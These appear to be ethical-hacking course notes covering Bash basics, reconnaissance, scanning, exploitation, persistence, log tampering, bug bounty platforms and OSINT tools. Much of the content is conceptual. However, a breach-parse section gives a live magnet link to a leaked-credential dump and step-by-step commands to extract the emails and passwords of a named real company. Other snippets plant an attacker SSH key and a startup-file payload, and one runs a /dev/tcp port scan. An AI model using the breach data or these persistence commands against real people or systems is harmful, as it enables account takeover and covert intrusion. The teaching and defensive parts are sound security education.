echo "x is 5"
else
echo "x is not 5"
fi
5. Functions:
You can define reusable blocks of code in functions. Functions can accept parameters and return
values.
Example:
greet() {
echo "Hello, $1"
}
greet "World" # Prints: Hello, World
6. Comments:
Anything after a # symbol is considered a comment and is ignored by the shell. Comments are
useful for explaining the purpose of the script or specific lines of code.
Example:
# This is a comment
7. Input:
You can capture user input using the read command.
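A minimal read example; the input is piped in here so it runs non-interactively, but at a terminal read would wait for the keyboard:

```shell
printf 'Alice\n' | {
  read -r name          # read one line into the variable `name`
  echo "Hello, $name"   # prints: Hello, Alice
}
```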
8. Pipes and Redirection:
Pipes (|) allow you to send the output of one command as input to another.
Redirection (>, >>) allows you to send output to a file instead of the terminal.
Example:
ls | grep "pattern" # Pipe output of `ls` into `grep`
echo "Hello World" > file.txt # Redirect output to file
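The read command can be combined with pipes and redirection; a small sketch (the input is piped in so the script runs unattended):

```shell
#!/bin/bash
# `read` captures input; here it is fed from a pipe instead of the keyboard
echo "Alice" | while read name; do
  echo "Hello, $name"
done > greeting.txt        # redirect the loop's output into a file
cat greeting.txt           # show what was written
```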
9. Exit Status:
Each command in Bash returns an exit status (also known as a return code), where 0 means success
and any non-zero value indicates an error. This can be checked using $?.
Example:
ls non_existent_file
echo $? # Outputs a non-zero value (e.g., 2: "No such file or directory")
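A common pattern is branching on the exit status directly with if; a small sketch using a throwaway file:

```shell
#!/bin/bash
# Branch on a command's exit status
printf 'root:x:0:0\nalice:x:1000:1000\n' > users.txt
if grep -q "root" users.txt; then   # grep exits 0 when it finds a match
  result="found"
else
  result="missing"
fi
echo "root entry: $result"
```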
10. Loops:
Loops allow you to repeat actions multiple times. For example:
For loop:
for i in {1..5}; do
echo "Number $i"
done
While loop:
count=1
while [ $count -le 5 ]; do
echo "Count is $count"
((count++))
done
Advantages of Bash Scripting:
• Automation: Bash scripts can automate repetitive tasks, saving time and reducing human error.
• Integration: Bash scripts can call and integrate with many other system tools and utilities, making
them extremely powerful.
• Portability: Bash scripts are portable across many Linux and Unix-like systems.
• Lightweight: Unlike more complex programming languages, bash scripts are lightweight and
execute quickly.
Use Cases for Bash Scripting:
• Networking: Automating tasks such as network configuration, testing connectivity, and managing
network interfaces.
#!/bin/bash
# Print basic network information (illustrative sketch)
echo "Hostname: $(hostname)"
ip -brief addr show
echo ""
Instructions to use:
1. Create a new script file: Save the above code in a new file, for example, network_info.sh.
2. Make it executable: Run the following command to make the script executable:
>> chmod +x network_info.sh
3. Run the script:
>> ./network_info.sh
Conclusion
Bash scripting is an essential skill for system administrators, developers, and power users who work
with Unix-like systems. It enables users to efficiently automate tasks, manage files, and interact with
the operating system, saving time and effort.
By understanding how to write and execute bash scripts, you can streamline your workflows and
ensure that repetitive tasks are handled automatically.
1. Reconnaissance
Reconnaissance refers to the process of gathering information about a target, often for the purpose
of conducting an attack, security testing, or intelligence collection.
In the context of cybersecurity and ethical hacking, reconnaissance is a critical first step in
identifying potential vulnerabilities in a system or network before launching an attack or penetration
test.
Reconnaissance can be classified into two main types:
• Active
• Passive
Active Reconnaissance:
Active reconnaissance involves directly interacting with a target system or network to gather
information. In this approach, the attacker or security tester sends requests or queries to the target,
and the target responds with data that can be analyzed for vulnerabilities.
This type of recon can include actions like port scanning, banner grabbing, and other forms of direct
probing. Active recon is typically more risky because it can alert the target to the presence of the
attacker or tester.
Passive Reconnaissance:
Passive reconnaissance involves gathering information about a target without directly interacting
with it. This approach relies on publicly available data, such as information on websites, social
media, DNS records, or other open-source intelligence (OSINT) sources. Since there is no direct
interaction with the target, passive recon is less likely to be detected by the target.
In summary, active recon involves engaging directly with the target to retrieve information, while
passive recon involves collecting information through observation without direct interaction with the
target system.
For penetration testers, reconnaissance is the initial phase of the engagement. It helps testers
understand the target environment and scope out potential attack vectors.
Ethical hackers perform both active and passive reconnaissance (following legal and ethical
guidelines) to map out the attack surface and identify vulnerabilities before attempting exploitation.
• Planning: Understanding the scope and objectives of the test, which systems or services are in-
scope, and gathering publicly available information (e.g., domain names, email addresses).
• Reconnaissance (Active & Passive): Collecting further information about the systems involved
using tools and techniques for OSINT gathering, network mapping, and scanning.
Reconnaissance is also a military term used to describe the act of gathering intelligence on an
enemy or area of interest, typically before an operation or engagement.
In espionage, it involves covertly acquiring data about a target, such as enemy movements,
resources, or capabilities, without being detected.
Reconnaissance in General:
More broadly, reconnaissance refers to any process of exploring or surveying an area or subject to
gather information, whether for military, business, or other purposes.
Conclusion:
Reconnaissance is a foundational phase in both offensive and defensive cybersecurity, as it sets the
stage for understanding the target environment. Whether done actively or passively, effective
reconnaissance can help identify security gaps, allowing defenders to fortify their defenses or
attackers to find points of weakness. It's an
essential process for anyone involved in cybersecurity, ethical hacking, or even general intelligence
gathering.
Scanning and enumeration are two crucial stages in the process of network security assessment,
penetration testing, or cyberattacks. Both are part of the reconnaissance phase and focus on
gathering more specific and detailed information about a target network or system.
These processes help an attacker or penetration tester identify the systems, services, and potential
vulnerabilities that may exist within a network.
Scanning
Scanning is the process of systematically probing a target system or network to gather information
about the devices, open ports, services, and potential security weaknesses. It involves sending
requests or probes to a target system and analyzing the responses to build a map of the network or
device.
There are different types of scanning techniques, each serving specific purposes.
Types of Scanning:
Port Scanning:
This is one of the most common scanning techniques. It involves identifying open ports on a target
system. Open ports can provide clues about the services running on the system (e.g., HTTP on port
80, SSH on port 22). Attackers can use this information to find vulnerabilities in services running on
these ports.
TCP Connect Scan: Establishes a full TCP connection to the target system to see if the port is open.
SYN Scan: Only sends a SYN packet to the target, which can be used to determine if a port is open
without completing the connection (more stealthy).
FIN Scan: Sends a TCP FIN packet to a port to check if it’s open (stealthy scan method).
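The connect-scan idea above can be sketched in pure bash using its /dev/tcp pseudo-device (a toy illustration against localhost with placeholder ports; only scan hosts you are authorized to test, and note that real scanners like Nmap are faster, stealthier, and far more capable):

```shell
#!/bin/bash
# Toy TCP connect scan: a port counts as open if bash can complete a connection
host="127.0.0.1"   # placeholder target
results=""
for port in 22 80 443; do
  if timeout 1 bash -c "echo > /dev/tcp/$host/$port" 2>/dev/null; then
    results+="Port $port: open"$'\n'
  else
    results+="Port $port: closed or filtered"$'\n'
  fi
done
printf '%s' "$results"
```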
Network Scanning:
This is used to discover devices on a network. It typically involves identifying the IP address range of
the target and then probing each address to identify live systems (hosts).
Vulnerability Scanning:
This type of scan attempts to detect vulnerabilities in a system by matching known vulnerabilities
(usually from databases such as CVE Common Vulnerabilities and Exposures) against the target's
services, operating systems, and configurations.
OS Fingerprinting:
This type of scan tries to identify the operating system running on a target system by analyzing the
responses to network traffic. Different operating systems (e.g., Windows, Linux) respond differently
to certain types of network traffic.
Network Discovery: Scanning helps identify active devices (IP addresses, routers, firewalls) on the
network and how they are connected.
Service Discovery: Scanning identifies which services are running on open ports (e.g., HTTP, FTP,
SSH, SMB).
Vulnerability Identification: By scanning for known vulnerabilities in services or devices, testers can
locate potential attack vectors.
Enumeration
Enumeration is a deeper, more detailed stage of information gathering that occurs after scanning. It
involves actively collecting information from a system or network, focusing on gathering specific
details about the services, users, systems, and network resources that are available.
Enumeration goes beyond just identifying open ports and services and aims to extract more
granular information, such as usernames, group memberships, shares, or version numbers.
Types of Enumeration:
Service Enumeration: After scanning a network for open ports, the next step is to enumerate the
specific services running on those ports. This includes identifying:
Service version
SMB Enumeration: In the case of Windows-based networks, SMB (Server Message Block)
enumeration is important for discovering shared folders, network shares, user lists, and more.
DNS Enumeration: This involves querying DNS servers to retrieve records like A records (IP
addresses for domains), MX records (mail servers), NS records (nameservers), and more. DNS
enumeration can reveal subdomains, which can be useful for identifying additional attack surfaces.
LDAP Enumeration: LDAP (Lightweight Directory Access Protocol) is often used to access and manage
directory services in networks. LDAP enumeration allows attackers to discover details about users,
groups, and organizational structures in a network.
NFS Enumeration: In Unix/Linux environments, NFS (Network File System) enumeration helps identify
shared resources like file systems and directories.
Email Enumeration: This type of enumeration identifies valid email addresses associated with a
target domain. Attackers can then use this information for spear-phishing attacks or other social
engineering tactics.
User Enumeration: Extracting valid usernames from a target system, which can be used for further
attacks like brute-forcing passwords.
Share Enumeration: Discovering network shares (files, printers, etc.) to gain access to sensitive data.
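As a local illustration of user enumeration, account names on a Linux host can be pulled straight from /etc/passwd (a defender-side sketch; run only on systems you own or are authorized to test):

```shell
#!/bin/bash
# Account names are the first colon-separated field of /etc/passwd
users=$(cut -d: -f1 /etc/passwd)
echo "$users" | head -5
echo "Total accounts: $(echo "$users" | wc -l)"
```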
Scanning at a glance:
• Purpose: Identifying open ports, active services, and vulnerabilities
• Depth: Surface-level discovery of systems and services
• Risk of Detection: Can be more detectable (especially in active scanning)
• Tools: Nmap, Masscan, Netcat, Nessus, OpenVAS
Conclusion
Scanning helps to map out a network or system by discovering active devices, open ports, and
running services.
Enumeration goes a step further by querying services to extract specific information about them,
such as usernames, shares, and configurations.
Both scanning and enumeration are essential steps in security assessments and penetration testing,
allowing security professionals to identify vulnerabilities and attack vectors. They are also key
stages for attackers in gathering detailed information needed to launch more focused and targeted
attacks.
Gaining Access (also known as Exploitation) is a crucial phase in a penetration test, cyberattack, or
ethical hacking process, where the information collected during reconnaissance, scanning, and
enumeration is used to exploit identified vulnerabilities and gain unauthorized access to a target
system or network. This phase often marks the transition from passive or preparatory activities to
active exploitation of weaknesses.
Exploitation: Overview
The goal is to exploit a vulnerability to execute malicious code or take control of a system in some
way, either to perform further attacks or to assess the security posture of the system.
Types of Exploits
Exploitation can involve several types of attacks depending on the nature of the vulnerability. These
can range from exploiting open ports, weak services, software flaws, to social engineering attacks.
Here are the primary types:
Remote Exploits:
These involve attacks where the attacker does not need physical access to the target system. They
exploit vulnerabilities over a network connection (e.g., via the internet or a local network).
Examples:
Buffer Overflow Exploits: Attacking a system by sending more data than a program can handle,
causing it to overwrite adjacent memory and allowing an attacker to run arbitrary code.
Web Application Exploits: Exploiting vulnerabilities in web applications, such as SQL injection, cross-
site scripting (XSS), or remote code execution (RCE).
Local Exploits:
Local exploits occur when the attacker has some level of access to the target system. The attacker
can exploit a vulnerability from within the system (e.g., executing commands with higher privileges).
Examples:
Privilege Escalation: Exploiting a system flaw or misconfiguration to elevate a user’s privileges from
standard user to administrator or root.
Password Cracking: Gaining access by cracking weak or exposed passwords stored in a local system
file or database.
Social Engineering:
This form of exploitation leverages human psychology to trick individuals into providing sensitive
information or taking actions that lead to security breaches.
Examples:
Phishing: Sending fraudulent emails or messages to steal sensitive data (e.g., login credentials).
Pretexting: Pretending to be someone else (e.g., an IT admin) to trick employees into disclosing
information.
Denial-of-Service (DoS) Attacks:
While primarily used for disruption rather than gaining access, these attacks involve exploiting
vulnerabilities to overwhelm a system or network, rendering it unavailable to legitimate users.
Password Attacks:
These attacks target weak or stolen passwords to gain unauthorized access to systems or accounts.
Exploitation often begins by cracking or guessing the password.
Examples:
Dictionary Attack: Using a precompiled list of common passwords to guess the correct one.
Credential Stuffing: Using previously leaked passwords and usernames to try and access other
accounts where users might have reused their credentials.
Various tools and techniques are used to exploit vulnerabilities and gain access to target systems.
Some of the most common methods include:
SQL Injection (SQLi): An attacker inserts malicious SQL code into input fields to manipulate the
database.
Cross-Site Scripting (XSS): Injecting malicious scripts into webpages viewed by users to steal session
cookies or redirect to malicious sites.
Remote Code Execution (RCE): Exploiting vulnerabilities in web applications to execute arbitrary
commands on a server.
Tools:
SQLmap: Automates the process of detecting and exploiting SQL injection flaws.
Burp Suite: A popular tool for web vulnerability scanning and exploitation, including XSS and RCE.
Metasploit: A framework that includes many exploits, including those for web applications.
RDP (Remote Desktop Protocol) Exploits: Exploiting weak configurations or vulnerabilities in RDP to
gain remote access to Windows machines.
Tools:
Hydra: A brute force tool used to guess passwords for various services, including SSH, RDP, and FTP.
Impacket: A collection of Python scripts that enable interaction with network protocols, such as SMB
and RDP.
Privilege Escalation:
After gaining initial access, attackers may exploit local vulnerabilities to escalate their privileges and
obtain full control of the system.
Methods:
Kernel Exploits: Exploiting bugs in the operating system kernel to gain root or administrator access.
Sudo Caching Attacks: If sudo permissions are improperly configured, an attacker might escalate
privileges by running commands as a higher-privileged user.
Tools:
LinPEAS (Linux Privilege Escalation Awesome Script): A tool that automates the process of finding
privilege escalation opportunities on Linux systems.
Windows Exploit Suggester: A tool that suggests Windows privilege escalation techniques based on
the OS version.
Metasploit Framework:
Metasploit can be used to automate the process of exploiting vulnerabilities, escalating privileges,
and maintaining access.
Exploit Modules: Used to launch exploits (e.g., exploiting a buffer overflow or RCE).
Post Exploitation Modules: Used to maintain access after exploiting a system, including creating
backdoors, keyloggers, and gathering credentials.
Auxiliary Modules: Used for scanning and gathering information but not directly exploiting
vulnerabilities.
Post-Exploitation
Once an attacker has successfully exploited a vulnerability and gained access, they often need to
maintain that access for further actions, such as data exfiltration, lateral movement, or privilege
escalation. This leads to the post-exploitation phase, which involves:
Maintaining Access: Establishing a backdoor or persistent access mechanism (e.g., creating a new
user account with admin privileges).
Privilege Escalation: If the attacker only has low-level access, they may attempt to escalate their
privileges to gain full control.
Lateral Movement: Moving to other systems in the network to expand the compromise.
Data Exfiltration: Stealing sensitive information, such as documents, passwords, or credit card data.
Tools:
Mimikatz: A popular tool for extracting clear-text passwords from Windows machines.
Netcat: Used to establish a remote shell and maintain access to compromised systems.
Conclusion
The exploitation phase is a critical step in both offensive security assessments (such as penetration
testing) and malicious attacks.
This phase is highly dependent on the types of vulnerabilities present and the specific attack
methods used, from network-based exploits to privilege escalation and social engineering tactics.
4. Maintain Access
When you're conducting reconnaissance (recon) for penetration testing, ethical hacking, or other
cybersecurity assessments, maintaining access is an important part of the process.
However, it’s important to clarify that maintaining access should only be done in legal, ethical, and
authorized contexts (such as penetration testing with client permission or within a bug bounty
program). Unauthorized access to systems is illegal and unethical.
Here’s a breakdown of ways attackers or penetration testers might maintain access during recon,
which is useful for understanding tactics that could be used to secure systems against intrusion:
A. Gaining Initial Access
Exploiting Vulnerabilities: Finding weaknesses in the system, whether it's an unpatched vulnerability
or a misconfiguration.
B. Creating Backdoors
Once access is gained, attackers or penetration testers will often establish persistent backdoors to
maintain access. Some of the methods include:
Web Shells: If an attacker can gain access to a web server, they might upload a web shell, which is a
script (usually PHP, ASP, etc.) that allows remote access to the server.
Reverse Shells: Attackers might use a reverse shell, where the target machine connects back to the
attacker's machine, allowing continuous access.
SSH Keys: Adding new SSH keys to the server to allow login without requiring passwords.
Trojans/Rootkits: Malicious software designed to stay hidden and maintain control of the
compromised system.
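The SSH-key technique above can be sketched in a scratch directory with a placeholder key string (nothing here touches a real account; shown so defenders know exactly what to audit):

```shell
#!/bin/bash
# Sketch of SSH-key persistence; the key string is a placeholder, not a real key,
# and /tmp/victim stands in for a compromised user's home directory
mkdir -p /tmp/victim/.ssh
echo "ssh-ed25519 AAAA...placeholder... attacker@evil" >> /tmp/victim/.ssh/authorized_keys
chmod 700 /tmp/victim/.ssh
chmod 600 /tmp/victim/.ssh/authorized_keys
# Defender's view: changes to authorized_keys are exactly what file-integrity
# monitoring should flag
ls -l /tmp/victim/.ssh/authorized_keys
```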
Metasploit: Metasploit's Meterpreter shell can be used to maintain access through payloads, as well
as to create a reverse shell, modify files, and run commands.
Cobalt Strike: A commercial penetration testing tool that provides advanced post-exploitation
features, including maintaining access and escalating privileges.
C. Escalating Privileges
To maintain access, an attacker often needs elevated privileges on a system to ensure they have
control over it and can persist:
Privilege Escalation: Attackers will attempt to escalate their privileges using tools or exploiting
known vulnerabilities in the system. This might involve exploiting a weakness to obtain root or
administrator access.
Clearing Logs: Deleting or modifying log files to remove evidence of the attacker's presence.
Hiding Malicious Code: Using obfuscation techniques or disguising the payloads to make detection
more difficult.
Rootkits and Anti-Forensics: Tools that hide malicious activity from administrators or intrusion
detection systems (IDS).
VPN or Proxy Setup: Configuring a VPN or proxy to route traffic through, which would obscure the
attacker’s real location and make it harder for defenders to detect the source.
C2 Servers: Setting up C2 infrastructure that allows the attacker to send commands to compromised
systems. Cobalt Strike, for example, often uses C2 infrastructure to control and manage
compromised hosts.
Creating New User Accounts: Adding new user accounts or modifying existing ones with elevated
privileges.
Install Persistent Services/Programs: Some attackers might install backdoors as system services or
create scheduled tasks that execute malicious programs regularly.
Modify Startup Files: Ensuring that a malicious program or backdoor is executed when the system
starts.
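The startup-file technique can be sketched with a scratch file standing in for ~/.bashrc and a hypothetical payload path:

```shell
#!/bin/bash
# Sketch of startup-file persistence; /tmp/demo_bashrc stands in for ~/.bashrc
# and /opt/payload.sh is a hypothetical path
echo '/opt/payload.sh &' >> /tmp/demo_bashrc
# Auditing side: grep startup files for entries you do not recognize
grep -n "payload" /tmp/demo_bashrc
```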
AutoRecon: A tool for automating reconnaissance, which can be useful for systematic enumeration
of a target.
BloodHound: A tool for Active Directory enumeration that can help attackers maintain access to
critical systems through privilege escalation.
DNS Tunneling: Using DNS queries and responses to exfiltrate data or receive commands, bypassing
network security monitoring.
ICMP Tunneling: Sending data via ICMP packets (ping requests), a method useful for bypassing
firewalls that block typical traffic.
Data Exfiltration: Using secure methods like encrypted tunnels or steganography to avoid detection
while transferring stolen data.
Lateral Movement: Moving from one system to another in the same network to expand the reach
and control within an organization.
Mitigation:
Regular System Audits: Regular vulnerability assessments, system hardening, and patch
management can help mitigate the risk of an attacker gaining initial access.
Strong Authentication: Multi-factor authentication (MFA) can make it harder for attackers to gain
control over user accounts.
Endpoint Detection & Response (EDR): Tools that monitor and respond to suspicious activity on
endpoints, looking for signs of backdoors or malicious activity.
Network Monitoring: Tools that look for unusual network traffic patterns, such as communication with
C2 servers or DNS tunneling attempts.
Incident Response Plan: Ensure the ability to detect, contain, and respond to incidents rapidly.
Automated detection systems like SIEM (Security Information and Event Management) are essential
for real-time visibility.
Again, this is all assuming you’re conducting security research or penetration testing in an
authorized and ethical manner. Always ensure you have proper authorization before conducting
recon or attempting to maintain access to any system.
5. Covering Tracks
Covering tracks refers to the techniques used by attackers or penetration testers to erase or
obscure evidence of their activities to avoid detection. This is done to maintain access and avoid
raising alarms. Here are the key methods used:
Clearing Logs:
Delete or modify system logs (e.g., event logs, access logs) to remove traces of exploitation or
suspicious activity.
Tools like logcleaner or manual editing can be used to clear logs in Linux/Windows systems.
Hiding Files and Processes:
Hiding files or processes that are running on the system to prevent detection by security tools.
Using Rootkits:
Rootkits are malicious tools designed to hide the presence of malware by intercepting calls to the
operating system, making it harder to detect by security software or administrators.
They can hide files, processes, network connections, and even registry entries.
Obfuscation:
Masking or encoding malicious code (e.g., using polymorphic malware or packing tools) to avoid
detection by signature-based security systems like antivirus.
Anti-Forensics:
Tools that prevent forensic analysis, such as wiping disk sectors or manipulating timestamps;
payload packers and encoders (e.g., Metasploit's encoders) can also be used to obfuscate payloads.
Disguising Malware:
Changing file names, disguising malware as legitimate files, or hiding them in innocuous-looking
locations (e.g., system directories).
Modifying Permissions:
Altering user or group permissions on sensitive files or directories to hide changes or prevent
detection by admins.
Planting False Evidence:
Sometimes attackers may insert fake evidence into logs or systems to mislead forensic
investigators.
Mitigation:
Regular Log Monitoring: Implementing real-time log monitoring can help detect unusual activities or
tampering.
File Integrity Monitoring: Tools that check file hashes regularly to spot unauthorized changes.
Endpoint Detection and Response (EDR): Solutions that look for signs of evasion techniques and
maintain visibility of critical system activities.
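The file-integrity idea can be sketched with sha256sum: record a baseline hash, then compare after a change (toy example with a local throwaway file):

```shell
#!/bin/bash
# Toy file-integrity check: record a baseline hash, then detect modification
echo "original contents" > watched.txt
baseline=$(sha256sum watched.txt | awk '{print $1}')
echo "tampered" >> watched.txt   # simulate an unauthorized change
current=$(sha256sum watched.txt | awk '{print $1}')
if [ "$baseline" != "$current" ]; then
  status="MODIFIED"
else
  status="UNCHANGED"
fi
echo "watched.txt: $status"
```

Real file-integrity monitors (e.g., AIDE, Tripwire) apply this same hash-comparison idea across the whole filesystem.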
Covering tracks is a critical part of an attacker's strategy to avoid detection, but it also highlights the
need for robust security monitoring and detection systems to identify and prevent it.
Bugcrowd is a crowdsourced security platform. It was founded in 2012, and in 2019 it was one of the
largest bug bounty and vulnerability disclosure companies on the internet. Bugcrowd runs bug
bounty programs and also offers a range of penetration testing services it refers to as "Penetration
Testing as a Service" (PTaaS), as well as attack surface management.
Link:
https://www.bugcrowd.com/
The companies listed on Bugcrowd permit penetration testing of their in-scope assets. The bug
bounty programs can be found here:
Link:
https://bugcrowd.com/programs
HackerOne
It was one of the first companies to embrace and utilize crowd-sourced security and cybersecurity
researchers as linchpins of its business model; pioneering bug bounty and coordinated vulnerability
disclosure.
As of December 2022, HackerOne's network had paid over $230 million in bounties. HackerOne's
customers include The U.S. Department of Defense, General Motors, GitHub, Goldman Sachs,
Google, Hyatt, Lufthansa, Microsoft, MINDEF Singapore, Nintendo, PayPal, Slack, Twitter, and Yahoo.
Link:
https://www.hackerone.com/
The companies listed on HackerOne permit penetration testing of their in-scope assets. The bug
bounty programs can be found here:
Link:
https://hackerone.com/bug-bounty-programs
Rules to follow
1. Read the Guidelines for the programs
2. Provide details of the vulnerability, including information needed to reproduce and validate the
vulnerability and a Proof of Concept (POC)
In-scope targets
In-scope targets define what you are allowed to test; anything outside the listed scope is off-limits.
Breach-parse:
A tool for parsing breached password data: it searches large credential dumps (such as the
BreachCompilation data set) and extracts the email addresses and passwords associated with a
given domain.
Breach-parse Link
https://github.com/Byte-Capsule-Ltd/breach-parse
https://github.com/hmaverickadams/breach-parse
magnet:?xt=urn:btih:7ffbcd8cee06aba2ce6561688cf68ce2addca0a3&dn=BreachCompilation&tr=udp%3A%2F%2Ftracker.openbittorrent.com%3A80&tr=udp%3A%2F%2Ftracker.leechers-paradise.org%3A6969&tr=udp%3A%2F%2Ftracker.coppersurfer.tk%3A6969&tr=udp%3A%2F%2Fglotorrents.pw%3A6969&tr=udp%3A%2F%2Ftracker.opentrackr.org%3A1337
Step 1:
Install qBittorrent if it is not already installed.
Add the magnet link to qBittorrent and download the BreachCompilation data set.
Step 2:
Switch to root:
>> sudo su
Change to the tool's directory:
# cd /opt/breach-parse
Run the script against a target domain, for example:
# ./breach-parse.sh @tesla.com tesla.txt
Note: Parsing the full data set will take some time.
When it finishes, the output files sit alongside the script:
# ls
BreachCompilation breach-parse.sh tesla-master.txt tesla-passwords.txt tesla-users.txt
To view the results with line numbers:
# cat -n tesla-master.txt
That's it.
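Under the hood, breach-parse essentially filters huge email:password dumps by domain. A toy version of the idea with fabricated sample data (all entries below are made up for illustration):

```shell
#!/bin/bash
# Toy version of what breach-parse does: filter email:password dumps by domain
# (the sample data is fabricated)
printf 'alice@tesla.com:hunter2\nbob@example.com:pass123\neve@tesla.com:qwerty\n' > dump.txt
grep "@tesla.com" dump.txt > tesla-master.txt        # full email:password pairs
cut -d: -f1 tesla-master.txt > tesla-users.txt       # just the emails
cut -d: -f2 tesla-master.txt > tesla-passwords.txt   # just the passwords
cat tesla-users.txt
```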
DeHashed provides free deep-web scans and protection against credential leaks. A modern personal
asset search engine created for security analysts, journalists, security companies, and everyday
people to help secure accounts.
Gather information from breach data
Have I Been Pwned allows you to search across multiple data breaches to see if your email address
or phone number has been compromised.
Shodan
https://www.shodan.io/
Shodan is a search engine that lets users search for various types of servers (webcams, routers,
servers, etc.) connected to the internet using a variety of filters.
Some have also described it as a search engine of service banners, the metadata that a server
sends back to the client. This can be information about the server software, what options the
service supports, a welcome message, or anything else that the client can find out before
interacting with the server.
Hunter
https://hunter.io/
Find email addresses and send cold emails. Hunter is the leading solution to find and verify
professional email addresses. Start using Hunter and connect with the people that matter for your
business.
Similar tools:
1. https://www.criminalip.io/en
2. https://search.censys.io/
3. https://www.zoomeye.hk/
4. https://ivre.rocks/
5. https://en.fofa.info/
6. https://wapiti-scanner.github.io/
7. https://weleakinfo.io/
8. https://www.onyphe.io/pricing#freemium
9. https://hunter.how/
2. crt.sh (website)
3. subfinder
Link:
https://github.com/projectdiscovery/subfinder
4. OWASP Amass
Link:
https://github.com/owasp-amass/amass
5. httprobe (by tomnomnom)
Checks whether discovered subdomains are live.
Link:
https://github.com/tomnomnom/httprobe
19. EHP Identifying Website Technologies
BuiltWith tracks over 2500 eCommerce technologies across over 26 million eCommerce websites
backed with extensive exportable attributes including spend, revenue, employee count, social media
count, industry, location, rank and many more.
Link:
https://builtwith.com
Wappalyzer
Find out the technology stack of any website. Create lists of websites and contacts by the
technologies they use.
Link:
https://www.wappalyzer.com
Whatweb
WhatWeb is a Kali Linux tool and comes preinstalled on the OS.
Command (example):
>> whatweb example.com
1. https://portswigger.net/web-security/all-topics
2. https://www.vaadata.com/blog/introduction-to-burp-suite-the-tool-dedicated-to-web-application-
security/
3. https://dataspaceacademy.com/blog/burp-suite-overview-features-tools-and-benefits
4. https://tcm-sec.com/burp-suite-macros-a-hands-on-guide/
5. https://www.youtube.com/watch?v=slxHpp7ilYU
6. https://en.wikipedia.org/wiki/Burp_Suite
7. https://tcm-sec.com/burp-extension-development-part-1-setup-basics/
8. https://tcm-sec.com/burp-extension-dev-part-4-gui-design/
Week 5
Google Fu
Google Fu refers to the art of crafting advanced search queries to uncover specific information on
the internet. In the context of ethical hacking, Google Fu is used to identify vulnerabilities, gather
intelligence, and aid in penetration testing. Here are some key concepts and techniques:
Filetype: Search for specific file types (e.g., filetype:pdf for PDF files).
Inurl: Search for keywords within URLs (e.g., inurl:login for pages with “login” in the URL).
Intext: Search for keywords within page content (e.g., intext:"password" for pages containing the
word “password”).
Intitle: Search for keywords in page titles (e.g., intitle:"index of" for directory listings).
Link: Search for pages linking to a specific URL (e.g., link:http://example.com).
Information gathering: Search for sensitive information, such as credentials, configuration files, or
error messages.
Directory listing: Use intitle:"index of" to find directory listings, which can reveal file structures and
potential vulnerabilities.
File discovery: Search for specific file types (e.g., filetype:sql) or use inurl to find files with specific
names.
Best Practices
Use quotes: Enclose search terms in quotes to search for exact phrases.
Use the site operator: Limit searches to specific websites using the site: operator (e.g.,
site:example.com).
Use the OR operator: Combine search terms using the OR operator (e.g., password OR
credentials).
Be cautious: Avoid using Google Fu for malicious purposes, as it can be used to identify and exploit
vulnerabilities.
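The operators and best practices above compose into single queries. As a quick illustration, here is a minimal query builder; the domain and search terms are placeholders, not targets from these notes:

```python
# Minimal Google-dork query builder illustrating the operators above.
# Always obtain permission before using such queries against a target.

def build_dork(site=None, filetype=None, inurl=None, intitle=None,
               intext=None, any_of=None):
    """Compose a Google search query from advanced operators."""
    parts = []
    if site:
        parts.append(f"site:{site}")
    if filetype:
        parts.append(f"filetype:{filetype}")
    if inurl:
        parts.append(f"inurl:{inurl}")
    if intitle:
        parts.append(f'intitle:"{intitle}"')
    if intext:
        parts.append(f'intext:"{intext}"')
    if any_of:  # OR-combined alternative terms
        parts.append("(" + " OR ".join(any_of) + ")")
    return " ".join(parts)

print(build_dork(site="example.com", filetype="pdf",
                 any_of=["password", "credentials"]))
# site:example.com filetype:pdf (password OR credentials)
```

The same helper reproduces the directory-listing dork from above with `build_dork(intitle="index of")`.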
Tools and Resources
Google Advanced Search: Explore Google’s built-in advanced search features and operators.
Google Dorking Database: Access a comprehensive database of Google hacking queries and
examples.
Acunetix Web Vulnerability Scanner: Utilize an automated web vulnerability scanner to identify
and prioritize vulnerabilities.
Ethical Considerations
Obtain permission: Ensure you have permission to conduct Google Fu searches and testing on the
targeted systems.
Respect privacy: Avoid searching for sensitive information or targeting systems without explicit
permission.
Report findings: Document and report any identified vulnerabilities or issues to the system owners
or administrators.
By mastering Google Fu and adhering to ethical guidelines, ethical hackers can leverage these
advanced search techniques to aid in penetration testing, vulnerability identification, and
information gathering, ultimately improving the security and resilience of targeted systems.
Google Dorks
Link:
https://dorksearch.com/
https://dorkgenius.com/
Link:
https://taksec.github.io/google-dorks-bug-bounty/
https://x.com/TakSec
Social media plays a crucial role in ethical hacking’s information gathering phase. Ethical hackers
leverage social media platforms to gather valuable insights about their targets, including:
Employee profiles: Hackers can identify employees, their roles, and connections, which helps in
understanding the organization’s structure and potential attack vectors.
Company information: Social media platforms often provide publicly available information about a
company, such as its products, services, and mission statements.
Network and system details: Hackers can gather information about a company’s network
infrastructure, including IP addresses, subdomains, and open ports.
Employee behavior: Observing employee behavior on social media can help hackers identify
potential vulnerabilities, such as weak passwords or phishing susceptibility.
Company culture: Social media can provide insights into a company’s culture, including its values,
policies, and security practices.
Several tools and techniques are used to gather information from social media platforms:
Recon-ng: A web reconnaissance framework that extracts information from social media platforms,
online databases, and web sources.
SpiderFoot: An open-source OSINT automation tool that collects information from various sources,
including social media, DNS, WHOIS, and threat intelligence feeds.
Google Fu: Advanced search-engine querying used to gather information from publicly
available sources, including social media profiles and company websites.
Best Practices
When utilizing social media for information gathering in ethical hacking, it’s essential to:
Respect privacy: Only gather publicly available information and avoid accessing private profiles or
data without explicit permission.
Use automated tools responsibly: Ensure that automated tools are configured to respect privacy
settings and avoid overwhelming social media platforms with requests.
Document findings: Keep detailed records of gathered information to facilitate analysis and
reporting.
Maintain ethical boundaries: Avoid using gathered information for malicious purposes and
prioritize the ethical hacking framework’s principles.
By leveraging social media effectively, ethical hackers can gather valuable information about their
targets, improving the accuracy and efficiency of their assessments and ultimately enhancing the
organization’s security posture.
Social media has become a valuable tool for gathering information about individuals. This can be
done through various means, including:
1. Profile Analysis
Social media profiles (e.g., Facebook, Twitter, LinkedIn) often contain publicly available information,
such as:
• Biographical details (name, age, location, occupation)
• Interests and hobbies
• Friends and connections
• Posts and updates (which can provide insights into their thoughts, opinions, and behaviors)
2. Social Listening
Social listening involves monitoring social media conversations about a specific individual,
organization, or topic. This can help gather information on:
• Mentions and references to the person
• Opinions and sentiments expressed about them
• Relevant discussions and topics they participate in
3. Social Media APIs and Tools
Many social media platforms provide APIs (Application Programming Interfaces) that allow
developers to access and collect data. Tools include:
• Twitter Streaming API
• Facebook Graph API
• LinkedIn API
• Social media listening tools (e.g., Hootsuite, Sprout Social)
